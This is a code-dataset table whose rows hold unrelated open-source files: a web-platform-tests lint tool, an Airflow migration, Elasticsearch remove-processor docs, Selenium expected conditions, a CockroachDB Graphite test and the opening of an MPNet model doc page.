code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
from __future__ import print_function, unicode_literals
import abc
import argparse
import ast
import itertools
import json
import os
import re
import subprocess
import sys
from collections import defaultdict
from . import fnmatch
from ..localpaths import repo_root
from ..gitignore.gitignore import PathFilter
from manifest.sourcefile import SourceFile, js_meta_re, python_meta_re
from six import binary_type, iteritems, itervalues
from six.moves import range
from six.moves.urllib.parse import urlsplit, urljoin
import logging
logger = None
def setup_logging(prefix=False):
global logger
if logger is None:
logger = logging.getLogger(os.path.basename(os.path.splitext(__file__)[0]))
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
if prefix:
format = logging.BASIC_FORMAT
else:
format = "%(message)s"
formatter = logging.Formatter(format)
for handler in logger.handlers:
handler.setFormatter(formatter)
logger.setLevel(logging.DEBUG)
setup_logging()
ERROR_MSG = """You must fix all errors; for details on how to fix them, see
https://github.com/w3c/web-platform-tests/blob/master/docs/lint-tool.md
However, instead of fixing a particular error, it's sometimes
OK to add a line to the lint.whitelist file in the root of the
web-platform-tests directory to make the lint tool ignore it.
For example, to make the lint tool ignore all '%s'
errors in the %s file,
you could add the following line to the lint.whitelist file.
%s:%s"""
def all_filesystem_paths(repo_root):
path_filter = PathFilter(repo_root, extras=[".git/*"])
for dirpath, dirnames, filenames in os.walk(repo_root):
for filename in filenames:
path = os.path.relpath(os.path.join(dirpath, filename), repo_root)
if path_filter(path):
yield path
dirnames[:] = [item for item in dirnames if
path_filter(os.path.relpath(os.path.join(dirpath, item) + "/",
repo_root))]
def _all_files_equal(paths):
"""
Checks all the paths are files that are byte-for-byte identical
:param paths: the list of paths to compare
:returns: True if they are all identical
"""
paths = list(paths)
if len(paths) < 2:
return True
first = paths.pop()
size = os.path.getsize(first)
if any(os.path.getsize(path) != size for path in paths):
return False
# Chunk this to avoid eating up memory and file descriptors
bufsize = 4096*4 # 16KB, a "reasonable" number of disk sectors
groupsize = 8 # Hypothesised to be large enough in the common case that everything fits in one group
with open(first, "rb") as first_f:
for start in range(0, len(paths), groupsize):
path_group = paths[start:start+groupsize]
first_f.seek(0)
try:
files = [open(x, "rb") for x in path_group]
for _ in range(0, size, bufsize):
a = first_f.read(bufsize)
for f in files:
b = f.read(bufsize)
if a != b:
return False
finally:
for f in files:
f.close()
return True
def check_path_length(repo_root, path, css_mode):
if len(path) + 1 > 150:
return [("PATH LENGTH", "/%s longer than maximum path length (%d > 150)" % (path, len(path) + 1), path, None)]
return []
def check_worker_collision(repo_root, path, css_mode):
endings = [(".any.html", ".any.js"),
(".any.worker.html", ".any.js"),
(".worker.html", ".worker.js")]
for path_ending, generated in endings:
if path.endswith(path_ending):
return [("WORKER COLLISION",
"path ends with %s which collides with generated tests from %s files" % (path_ending, generated),
path,
None)]
return []
drafts_csswg_re = re.compile(r"https?\:\/\/drafts\.csswg\.org\/([^/?#]+)")
w3c_tr_re = re.compile(r"https?\:\/\/www\.w3c?\.org\/TR\/([^/?#]+)")
w3c_dev_re = re.compile(r"https?\:\/\/dev\.w3c?\.org\/[^/?#]+\/([^/?#]+)")
def check_css_globally_unique(repo_root, paths, css_mode):
"""
Checks that CSS filenames are sufficiently unique
This groups files by path classifying them as "test", "reference", or
"support".
"test" files must have a unique name across files that share links to the
same spec.
"reference" and "support" files, on the other hand, must have globally
unique names.
:param repo_root: the repository root
:param paths: list of all paths
:param css_mode: whether we're in CSS testsuite mode
:returns: a list of errors found in ``paths``
"""
test_files = defaultdict(set)
ref_files = defaultdict(set)
support_files = defaultdict(set)
for path in paths:
if os.name == "nt":
path = path.replace("\\", "/")
if not css_mode:
if not path.startswith("css/"):
continue
# we're within css or in css_mode after all that
source_file = SourceFile(repo_root, path, "/")
if source_file.name_is_non_test:
# If we're name_is_non_test for a reason apart from support, ignore it.
# We care about support because of the requirement all support files in css/ to be in
# a support directory; see the start of check_parsed.
offset = path.find("/support/")
if offset == -1:
continue
parts = source_file.dir_path.split(os.path.sep)
if (parts[0] in source_file.root_dir_non_test or
any(item in source_file.dir_non_test - {"support"} for item in parts) or
any(parts[:len(non_test_path)] == list(non_test_path) for non_test_path in source_file.dir_path_non_test)):
continue
name = path[offset+1:]
support_files[name].add(path)
elif source_file.name_is_reference:
ref_files[source_file.name].add(path)
else:
test_files[source_file.name].add(path)
errors = []
for name, colliding in iteritems(test_files):
if len(colliding) > 1:
if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]):
# Only compute by_spec if there are prima-facie collisions because of cost
by_spec = defaultdict(set)
for path in colliding:
source_file = SourceFile(repo_root, path, "/")
for link in source_file.spec_links:
for r in (drafts_csswg_re, w3c_tr_re, w3c_dev_re):
m = r.match(link)
if m:
spec = m.group(1)
break
else:
continue
by_spec[spec].add(path)
for spec, paths in iteritems(by_spec):
if not _all_files_equal([os.path.join(repo_root, x) for x in paths]):
for x in paths:
errors.append(("CSS-COLLIDING-TEST-NAME",
"The filename %s in the %s testsuite is shared by: %s"
% (name,
spec,
", ".join(sorted(paths))),
x,
None))
for error_name, d in [("CSS-COLLIDING-REF-NAME", ref_files),
("CSS-COLLIDING-SUPPORT-NAME", support_files)]:
for name, colliding in iteritems(d):
if len(colliding) > 1:
if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]):
for x in colliding:
errors.append((error_name,
"The filename %s is shared by: %s" % (name,
", ".join(sorted(colliding))),
x,
None))
return errors
def parse_whitelist(f):
"""
Parse the whitelist file given by `f`, and return the parsed structure.
"""
data = defaultdict(lambda:defaultdict(set))
ignored_files = set()
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
parts = [item.strip() for item in line.split(":")]
if len(parts) == 2:
parts.append(None)
else:
parts[-1] = int(parts[-1])
error_types, file_match, line_number = parts
error_types = {item.strip() for item in error_types.split(",")}
file_match = os.path.normcase(file_match)
if "*" in error_types:
ignored_files.add(file_match)
else:
for error_type in error_types:
data[error_type][file_match].add(line_number)
return data, ignored_files
def filter_whitelist_errors(data, errors):
"""
Filter out those errors that are whitelisted in `data`.
"""
if not errors:
return []
whitelisted = [False for item in range(len(errors))]
for i, (error_type, msg, path, line) in enumerate(errors):
normpath = os.path.normcase(path)
if error_type in data:
wl_files = data[error_type]
for file_match, allowed_lines in iteritems(wl_files):
if None in allowed_lines or line in allowed_lines:
if fnmatch.fnmatchcase(normpath, file_match):
whitelisted[i] = True
return [item for i, item in enumerate(errors) if not whitelisted[i]]
class Regexp(object):
pattern = None
file_extensions = None
error = None
_re = None
def __init__(self):
self._re = re.compile(self.pattern)
def applies(self, path):
return (self.file_extensions is None or
os.path.splitext(path)[1] in self.file_extensions)
def search(self, line):
return self._re.search(line)
class TrailingWhitespaceRegexp(Regexp):
pattern = b"[ \t\f\v]$"
error = "TRAILING WHITESPACE"
description = "Whitespace at EOL"
class TabsRegexp(Regexp):
pattern = b"^\t"
error = "INDENT TABS"
description = "Tabs used for indentation"
class CRRegexp(Regexp):
pattern = b"\r$"
error = "CR AT EOL"
description = "CR character in line separator"
class SetTimeoutRegexp(Regexp):
pattern = b"setTimeout\s*\("
error = "SET TIMEOUT"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "setTimeout used; step_timeout should typically be used instead"
class W3CTestOrgRegexp(Regexp):
pattern = b"w3c\-test\.org"
error = "W3C-TEST.ORG"
description = "External w3c-test.org domain used"
class Webidl2Regexp(Regexp):
pattern = b"webidl2\.js"
error = "WEBIDL2.JS"
description = "Legacy webidl2.js script used"
class ConsoleRegexp(Regexp):
pattern = b"console\.[a-zA-Z]+\s*\("
error = "CONSOLE"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "Console logging API used"
class PrintRegexp(Regexp):
pattern = b"print(?:\s|\s*\()"
error = "PRINT STATEMENT"
file_extensions = [".py"]
description = "Print function used"
regexps = [item() for item in
[TrailingWhitespaceRegexp,
TabsRegexp,
CRRegexp,
SetTimeoutRegexp,
W3CTestOrgRegexp,
Webidl2Regexp,
ConsoleRegexp,
PrintRegexp]]
def check_regexp_line(repo_root, path, f, css_mode):
errors = []
applicable_regexps = [regexp for regexp in regexps if regexp.applies(path)]
for i, line in enumerate(f):
for regexp in applicable_regexps:
if regexp.search(line):
errors.append((regexp.error, regexp.description, path, i+1))
return errors
def check_parsed(repo_root, path, f, css_mode):
source_file = SourceFile(repo_root, path, "/", contents=f.read())
errors = []
if css_mode or path.startswith("css/"):
if (source_file.type == "support" and
not source_file.name_is_non_test and
not source_file.name_is_reference):
return [("SUPPORT-WRONG-DIR", "Support file not in support directory", path, None)]
if (source_file.type != "support" and
not source_file.name_is_reference and
not source_file.spec_links):
return [("MISSING-LINK", "Testcase file must have a link to a spec", path, None)]
if source_file.name_is_non_test or source_file.name_is_manual:
return []
if source_file.markup_type is None:
return []
if source_file.root is None:
return [("PARSE-FAILED", "Unable to parse file", path, None)]
if source_file.type == "manual" and not source_file.name_is_manual:
return [("CONTENT-MANUAL", "Manual test whose filename doesn't end in '-manual'", path, None)]
if source_file.type == "visual" and not source_file.name_is_visual:
return [("CONTENT-VISUAL", "Visual test whose filename doesn't end in '-visual'", path, None)]
for reftest_node in source_file.reftest_nodes:
href = reftest_node.attrib.get("href", "")
parts = urlsplit(href)
if parts.scheme or parts.netloc:
errors.append(("ABSOLUTE-URL-REF",
"Reference test with a reference file specified via an absolute URL: '%s'" % href, path, None))
continue
ref_url = urljoin(source_file.url, href)
ref_parts = urlsplit(ref_url)
if source_file.url == ref_url:
errors.append(("SAME-FILE-REF",
"Reference test which points at itself as a reference",
path,
None))
continue
assert ref_parts.path != ""
reference_file = os.path.join(repo_root, ref_parts.path[1:])
reference_rel = reftest_node.attrib.get("rel", "")
if not os.path.isfile(reference_file):
errors.append(("NON-EXISTENT-REF",
"Reference test with a non-existent '%s' relationship reference: '%s'" % (reference_rel, href), path, None))
if len(source_file.timeout_nodes) > 1:
errors.append(("MULTIPLE-TIMEOUT", "More than one meta name='timeout'", path, None))
for timeout_node in source_file.timeout_nodes:
timeout_value = timeout_node.attrib.get("content", "").lower()
if timeout_value != "long":
errors.append(("INVALID-TIMEOUT", "Invalid timeout value %s" % timeout_value, path, None))
if source_file.testharness_nodes:
if len(source_file.testharness_nodes) > 1:
errors.append(("MULTIPLE-TESTHARNESS",
"More than one <script src='/resources/testharness.js'>", path, None))
testharnessreport_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testharnessreport.js']")
if not testharnessreport_nodes:
errors.append(("MISSING-TESTHARNESSREPORT",
"Missing <script src='/resources/testharnessreport.js'>", path, None))
else:
if len(testharnessreport_nodes) > 1:
errors.append(("MULTIPLE-TESTHARNESSREPORT",
"More than one <script src='/resources/testharnessreport.js'>", path, None))
testharnesscss_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}link[@href='/resources/testharness.css']")
if testharnesscss_nodes:
errors.append(("PRESENT-TESTHARNESSCSS",
"Explicit link to testharness.css present", path, None))
for element in source_file.variant_nodes:
if "content" not in element.attrib:
errors.append(("VARIANT-MISSING",
"<meta name=variant> missing 'content' attribute", path, None))
else:
variant = element.attrib["content"]
if variant != "" and variant[0] not in ("?", "#"):
errors.append(("MALFORMED-VARIANT",
"%s <meta name=variant> 'content' attribute must be the empty string or start with '?' or '#'" % path, None))
seen_elements = {"timeout": False,
"testharness": False,
"testharnessreport": False}
required_elements = [key for key, value in {"testharness": True,
"testharnessreport": len(testharnessreport_nodes) > 0,
"timeout": len(source_file.timeout_nodes) > 0}.items()
if value]
for elem in source_file.root.iter():
if source_file.timeout_nodes and elem == source_file.timeout_nodes[0]:
seen_elements["timeout"] = True
if seen_elements["testharness"]:
errors.append(("LATE-TIMEOUT",
"<meta name=timeout> seen after testharness.js script", path, None))
elif elem == source_file.testharness_nodes[0]:
seen_elements["testharness"] = True
elif testharnessreport_nodes and elem == testharnessreport_nodes[0]:
seen_elements["testharnessreport"] = True
if not seen_elements["testharness"]:
errors.append(("EARLY-TESTHARNESSREPORT",
"testharnessreport.js script seen before testharness.js script", path, None))
if all(seen_elements[name] for name in required_elements):
break
for element in source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src]"):
src = element.attrib["src"]
for name in ["testharness", "testharnessreport"]:
if "%s.js" % name == src or ("/%s.js" % name in src and src != "/resources/%s.js" % name):
errors.append(("%s-PATH" % name.upper(), "%s.js script seen with incorrect path" % name, path, None))
return errors
class ASTCheck(object):
__metaclass__ = abc.ABCMeta
error = None
description = None
@abc.abstractmethod
def check(self, root):
pass
class OpenModeCheck(ASTCheck):
error = "OPEN-NO-MODE"
description = "File opened without providing an explicit mode (note: binary files must be read with 'b' in the mode flags)"
def check(self, root):
errors = []
for node in ast.walk(root):
if isinstance(node, ast.Call):
if hasattr(node.func, "id") and node.func.id in ("open", "file"):
if (len(node.args) < 2 and
all(item.arg != "mode" for item in node.keywords)):
errors.append(node.lineno)
return errors
ast_checkers = [item() for item in [OpenModeCheck]]
def check_python_ast(repo_root, path, f, css_mode):
if not path.endswith(".py"):
return []
try:
root = ast.parse(f.read())
except SyntaxError as e:
return [("PARSE-FAILED", "Unable to parse file", path, e.lineno)]
errors = []
for checker in ast_checkers:
for lineno in checker.check(root):
errors.append((checker.error, checker.description, path, lineno))
return errors
broken_js_metadata = re.compile(b"//\s*META:")
broken_python_metadata = re.compile(b"#\s*META:")
def check_script_metadata(repo_root, path, f, css_mode):
if path.endswith((".worker.js", ".any.js")):
meta_re = js_meta_re
broken_metadata = broken_js_metadata
elif path.endswith(".py"):
meta_re = python_meta_re
broken_metadata = broken_python_metadata
else:
return []
done = False
errors = []
for idx, line in enumerate(f):
assert isinstance(line, binary_type), line
m = meta_re.match(line)
if m:
key, value = m.groups()
if key == b"timeout":
if value != b"long":
errors.append(("UNKNOWN-TIMEOUT-METADATA", "Unexpected value for timeout metadata", path, idx + 1))
elif key == b"script":
pass
else:
errors.append(("UNKNOWN-METADATA", "Unexpected kind of metadata", path, idx + 1))
else:
done = True
if done:
if meta_re.match(line):
errors.append(("STRAY-METADATA", "Metadata comments should start the file", path, idx + 1))
elif meta_re.search(line):
errors.append(("INDENTED-METADATA", "Metadata comments should start the line", path, idx + 1))
elif broken_metadata.search(line):
errors.append(("BROKEN-METADATA", "Metadata comment is not formatted correctly", path, idx + 1))
return errors
def check_path(repo_root, path, css_mode):
"""
Runs lints that check the file path.
:param repo_root: the repository root
:param path: the path of the file within the repository
:param css_mode: whether we're in CSS testsuite mode
:returns: a list of errors found in ``path``
"""
errors = []
for path_fn in path_lints:
errors.extend(path_fn(repo_root, path, css_mode))
return errors
def check_all_paths(repo_root, paths, css_mode):
"""
Runs lints that check all paths globally.
:param repo_root: the repository root
:param paths: a list of all the paths within the repository
:param css_mode: whether we're in CSS testsuite mode
:returns: a list of errors found in ``f``
"""
errors = []
for paths_fn in all_paths_lints:
errors.extend(paths_fn(repo_root, paths, css_mode))
return errors
def check_file_contents(repo_root, path, f, css_mode):
"""
Runs lints that check the file contents.
:param repo_root: the repository root
:param path: the path of the file within the repository
:param f: a file-like object with the file contents
:param css_mode: whether we're in CSS testsuite mode
:returns: a list of errors found in ``f``
"""
errors = []
for file_fn in file_lints:
errors.extend(file_fn(repo_root, path, f, css_mode))
f.seek(0)
return errors
def output_errors_text(errors):
for error_type, description, path, line_number in errors:
pos_string = path
if line_number:
pos_string += ":%s" % line_number
logger.error("%s: %s (%s)" % (pos_string, description, error_type))
def output_errors_markdown(errors):
if not errors:
return
heading = """Got lint errors:
| Error Type | Position | Message |
|------------|----------|---------|"""
for line in heading.split("\n"):
logger.error(line)
for error_type, description, path, line_number in errors:
pos_string = path
if line_number:
pos_string += ":%s" % line_number
logger.error("%s | %s | %s |" % (error_type, pos_string, description))
def output_errors_json(errors):
for error_type, error, path, line_number in errors:
print(json.dumps({"path": path, "lineno": line_number,
"rule": error_type, "message": error}))
def output_error_count(error_count):
if not error_count:
return
by_type = " ".join("%s: %d" % item for item in error_count.items())
count = sum(error_count.values())
logger.info("")
if count == 1:
logger.info("There was 1 error (%s)" % (by_type,))
else:
logger.info("There were %d errors (%s)" % (count, by_type))
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("paths", nargs="*",
help="List of paths to lint")
parser.add_argument("--json", action="store_true",
help="Output machine-readable JSON format")
parser.add_argument("--markdown", action="store_true",
help="Output markdown")
parser.add_argument("--css-mode", action="store_true",
help="Run CSS testsuite specific lints")
return parser.parse_args()
def main(**kwargs):
if kwargs.get("json") and kwargs.get("markdown"):
logger.critical("Cannot specify --json and --markdown")
sys.exit(2)
output_format = {(True, False): "json",
(False, True): "markdown",
(False, False): "normal"}[(kwargs.get("json", False),
kwargs.get("markdown", False))]
paths = list(kwargs.get("paths") if kwargs.get("paths") else all_filesystem_paths(repo_root))
if output_format == "markdown":
setup_logging(True)
return lint(repo_root, paths, output_format, kwargs.get("css_mode", False))
def lint(repo_root, paths, output_format, css_mode):
error_count = defaultdict(int)
last = None
with open(os.path.join(repo_root, "lint.whitelist")) as f:
whitelist, ignored_files = parse_whitelist(f)
output_errors = {"json": output_errors_json,
"markdown": output_errors_markdown,
"normal": output_errors_text}[output_format]
def process_errors(errors):
"""
Filters and prints the errors, and updates the ``error_count`` object.
:param errors: a list of error tuples (error type, message, path, line number)
:returns: ``None`` if there were no errors, or
a tuple of the error type and the path otherwise
"""
errors = filter_whitelist_errors(whitelist, errors)
if not errors:
return None
output_errors(errors)
for error_type, error, path, line in errors:
error_count[error_type] += 1
return (errors[-1][0], path)
for path in paths[:]:
abs_path = os.path.join(repo_root, path)
if not os.path.exists(abs_path):
paths.remove(path)
continue
if any(fnmatch.fnmatch(path, file_match) for file_match in ignored_files):
paths.remove(path)
continue
errors = check_path(repo_root, path, css_mode)
last = process_errors(errors) or last
if not os.path.isdir(abs_path):
with open(abs_path, 'rb') as f:
errors = check_file_contents(repo_root, path, f, css_mode)
last = process_errors(errors) or last
errors = check_all_paths(repo_root, paths, css_mode)
last = process_errors(errors) or last
if output_format in ("normal", "markdown"):
output_error_count(error_count)
if error_count:
for line in (ERROR_MSG % (last[0], last[1], last[0], last[1])).split("\n"):
logger.info(line)
return sum(itervalues(error_count))
path_lints = [check_path_length, check_worker_collision]
all_paths_lints = [check_css_globally_unique]
file_lints = [check_regexp_line, check_parsed, check_python_ast, check_script_metadata]
if __name__ == "__main__":
args = parse_args()
error_count = main(**vars(args))
if error_count > 0:
sys.exit(1) | unknown | codeparrot/codeparrot-clean | ||
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add task fails journal table
Revision ID: 64de9cddf6c9
Revises: 211e584da130
Create Date: 2016-08-03 14:02:59.203021
"""
# revision identifiers, used by Alembic.
revision = '64de9cddf6c9'
down_revision = '211e584da130'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'task_fail',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('task_id', sa.String(length=250), nullable=False),
sa.Column('dag_id', sa.String(length=250), nullable=False),
sa.Column('execution_date', sa.DateTime(), nullable=False),
sa.Column('start_date', sa.DateTime(), nullable=True),
sa.Column('end_date', sa.DateTime(), nullable=True),
sa.Column('duration', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
def downgrade():
op.drop_table('task_fail') | unknown | codeparrot/codeparrot-clean | ||
---
navigation_title: "Remove"
mapped_pages:
- https://www.elastic.co/guide/en/elasticsearch/reference/current/remove-processor.html
---
# Remove processor [remove-processor]
Removes existing fields. If one field doesn’t exist, an exception will be thrown.
$$$remove-options$$$
| Name | Required | Default | Description |
| --- | --- | --- | --- |
| `field` | yes | - | Fields to be removed. Supports [template snippets](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md#template-snippets). This parameter is not required if you use `keep` instead. |
| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document |
| `keep` | no | - | Fields to keep. When set, all fields other than those specified are removed. |
| `description` | no | - | Description of the processor. Useful for describing the purpose of the processor or its configuration. |
| `if` | no | - | Conditionally execute the processor. See [Conditionally run a processor](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md#conditionally-run-processor). |
| `ignore_failure` | no | `false` | Ignore failures for the processor. See [Handling pipeline failures](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md#handling-pipeline-failures). |
| `on_failure` | no | - | Handle failures for the processor. See [Handling pipeline failures](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md#handling-pipeline-failures). |
| `tag` | no | - | Identifier for the processor. Useful for debugging and metrics. |
Here is an example to remove a single field:
```js
{
"remove": {
"field": "user_agent"
}
}
```
% NOTCONSOLE
To remove multiple fields, you can use the following query:
```js
{
"remove": {
"field": ["user_agent", "url"]
}
}
```
% NOTCONSOLE
You can also choose to remove all fields other than a specified list:
```js
{
"remove": {
"keep": ["url"]
}
}
```
% NOTCONSOLE | unknown | github | https://github.com/elastic/elasticsearch | docs/reference/enrich-processor/remove-processor.md |
#
# Copyright 2012 WebDriver committers
# Copyright 2012 Software Freedom Conservancy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoSuchFrameException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import NoAlertPresentException
"""
* Canned "Expected Conditions" which are generally useful within webdriver
* tests.
"""
class title_is(object):
"""An expectation for checking the title of a page.
title is the expected title, which must be an exact match
returns True if the title matches, false otherwise."""
def __init__(self, title):
self.title = title
def __call__(self, driver):
return self.title == driver.title
class title_contains(object):
""" An expectation for checking that the title contains a case-sensitive
substring. title is the fragment of title expected
returns True when the title matches, False otherwise
"""
def __init__(self, title):
self.title = title
def __call__(self, driver):
return self.title in driver.title
class presence_of_element_located(object):
""" An expectation for checking that an element is present on the DOM
of a page. This does not necessarily mean that the element is visible.
locator - used to find the element
returns the WebElement once it is located
"""
def __init__(self, locator):
self.locator = locator
def __call__(self, driver):
return _find_element(driver, self.locator)
class visibility_of_element_located(object):
""" An expectation for checking that an element is present on the DOM of a
page and visible. Visibility means that the element is not only displayed
but also has a height and width that is greater than 0.
locator - used to find the element
returns the WebElement once it is located and visible
"""
def __init__(self, locator):
self.locator = locator
def __call__(self, driver):
try:
return _element_if_visible(_find_element(driver, self.locator))
except StaleElementReferenceException:
return False
class visibility_of(object):
""" An expectation for checking that an element, known to be present on the
DOM of a page, is visible. Visibility means that the element is not only
displayed but also has a height and width that is greater than 0.
element is the WebElement
returns the (same) WebElement once it is visible
"""
def __init__(self, element):
self.element = element
def __call__(self, ignored):
return _element_if_visible(self.element)
def _element_if_visible(element, visibility=True):
return element if element.is_displayed() == visibility else False
class presence_of_all_elements_located(object):
""" An expectation for checking that there is at least one element present
on a web page.
locator is used to find the element
returns the list of WebElements once they are located
"""
def __init__(self, locator):
self.locator = locator
def __call__(self, driver):
return _find_elements(driver, self.locator)
class text_to_be_present_in_element(object):
""" An expectation for checking if the given text is present in the
specified element.
locator, text
"""
def __init__(self, locator, text_):
self.locator = locator
self.text = text_
def __call__(self, driver):
try :
element_text = _find_element(driver, self.locator).text
return self.text in element_text
except StaleElementReferenceException:
return False
class text_to_be_present_in_element_value(object):
"""
An expectation for checking if the given text is present in the element's
locator, text
"""
def __init__(self, locator, text_):
self.locator = locator
self.text = text_
def __call__(self, driver):
try:
element_text = _find_element(driver,
self.locator).get_attribute("value")
if element_text:
return self.text in element_text
else:
return False
except StaleElementReferenceException:
return False
class frame_to_be_available_and_switch_to_it(object):
""" An expectation for checking whether the given frame is available to
switch to. If the frame is available it switches the given driver to the
specified frame.
"""
def __init__(self, locator):
self.frame_locator = locator
def __call__(self, driver):
try:
if isinstance(self.frame_locator, tuple):
driver.switch_to.frame(_find_element(driver,
self.frame_locator))
else:
driver.switch_to.frame(self.frame_locator)
return True
except NoSuchFrameException:
return False
class invisibility_of_element_located(object):
""" An Expectation for checking that an element is either invisible or not
present on the DOM.
locator used to find the element
"""
def __init__(self, locator):
self.locator = locator
def __call__(self, driver):
try:
return _element_if_visible(_find_element(driver, self.locator), False)
except (NoSuchElementException, StaleElementReferenceException):
# In the case of NoSuchElement, returns true because the element is
# not present in DOM. The try block checks if the element is present
# but is invisible.
# In the case of StaleElementReference, returns true because stale
# element reference implies that element is no longer visible.
return True
class element_to_be_clickable(object):
""" An Expectation for checking an element is visible and enabled such that
you can click it."""
def __init__(self, locator):
self.locator = locator
def __call__(self, driver):
element = visibility_of_element_located(self.locator)(driver)
if element and element.is_enabled():
return element
else:
return False
class staleness_of(object):
""" Wait until an element is no longer attached to the DOM.
element is the element to wait for.
returns False if the element is still attached to the DOM, true otherwise.
"""
def __init__(self, element):
self.element = element
def __call__(self, ignored):
try:
# Calling any method forces a staleness check
self.element.is_enabled()
return False
except StaleElementReferenceException as expected:
return True
class element_to_be_selected(object):
""" An expectation for checking the selection is selected.
element is WebElement object
"""
def __init__(self, element):
self.element = element
def __call__(self, ignored):
return self.element.is_selected()
class element_located_to_be_selected(object):
"""An expectation for the element to be located is selected.
locator is a tuple of (by, path)"""
def __init__(self, locator):
self.locator = locator
def __call__(self, driver):
return _find_element(driver, self.locator).is_selected()
class element_selection_state_to_be(object):
""" An expectation for checking if the given element is selected.
element is WebElement object
is_selected is a Boolean."
"""
def __init__(self, element, is_selected):
self.element = element
self.is_selected = is_selected
def __call__(self, ignored):
return self.element.is_selected() == self.is_selected
class element_located_selection_state_to_be(object):
""" An expectation to locate an element and check if the selection state
specified is in that state.
locator is a tuple of (by, path)
is_selected is a boolean
"""
def __init__(self, locator, is_selected):
self.locator = locator
self.is_selected = is_selected
def __call__(self, driver):
try:
element = _find_element(driver, self.locator)
return element.is_selected() == self.is_selected
except StaleElementReferenceException:
return False
class alert_is_present(object):
""" Expect an alert to be present."""
def __init__(self):
pass
def __call__(self, driver):
try:
alert = driver.switch_to.alert
alert.text
return alert
except NoAlertPresentException:
return False
def _find_element(driver, by):
"""Looks up an element. Logs and re-raises ``WebDriverException``
if thrown."""
try :
return driver.find_element(*by)
except NoSuchElementException as e:
raise e
except WebDriverException as e:
raise e
def _find_elements(driver, by):
try :
return driver.find_elements(*by)
except WebDriverException as e:
raise e | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2018 The Cockroach Authors.
//
// Use of this software is governed by the CockroachDB Software License
// included in the /LICENSE file.
package server
import (
"context"
"fmt"
"net"
"testing"
"time"
"github.com/cockroachdb/cockroach/pkg/base"
"github.com/cockroachdb/cockroach/pkg/testutils/serverutils"
"github.com/cockroachdb/cockroach/pkg/testutils/sqlutils"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/cockroachdb/cockroach/pkg/util/log"
)
// TestGraphite tests that a server pushes metrics data to Graphite endpoint,
// if configured. In addition, it verifies that things don't fall apart when
// the endpoint goes away.
//
// TODO(obs-inf): this test takes 2m because GraphiteExporter.Push times out after
// 2m with a `write: broken pipe` error, even though it's using a DialTimeout. This
// is a waste of time.
func TestGraphite(t *testing.T) {
defer leaktest.AfterTest(t)()
defer log.Scope(t).Close(t)
s, rawDB, _ := serverutils.StartServer(t, base.TestServerArgs{})
defer s.Stopper().Stop(context.Background())
ctx := context.Background()
const setQ = `SET CLUSTER SETTING "%s" = "%s"`
const interval = 3 * time.Millisecond
db := sqlutils.MakeSQLRunner(rawDB)
db.Exec(t, fmt.Sprintf(setQ, graphiteIntervalKey, interval))
listen := func() {
lis, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
t.Fatal("failed to open port", err)
}
p := lis.Addr().String()
log.Dev.Infof(ctx, "Open port %s and listening", p)
defer func() {
log.Dev.Infof(ctx, "Close port %s", p)
if err := lis.Close(); err != nil {
t.Fatal("failed to close port", err)
}
}()
db.Exec(t, fmt.Sprintf(setQ, "external.graphite.endpoint", p))
if _, e := lis.Accept(); e != nil {
t.Fatal("failed to receive connection", e)
} else {
log.Dev.Info(ctx, "received connection")
}
}
listen()
log.Dev.Info(ctx, "Make sure things don't fall apart when endpoint goes away.")
time.Sleep(5 * interval)
listen()
} | go | github | https://github.com/cockroachdb/cockroach | pkg/server/graphite_test.go |
<!--Copyright 2020 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
⚠️ Note that this file is in Markdown but contain specific syntax for our doc-builder (similar to MDX) that may not be
rendered properly in your Markdown viewer.
-->
*This model was released on 2020-04-20 and added to Hugging Face Transformers on 2020-12-09.*
# MPNet
<div class="flex flex-wrap space-x-1">
<img alt="PyTorch" src="https://img.shields.io/badge/PyTorch-DE3412?style=flat&logo=pytorch&logoColor=white">
</div>
## Overview
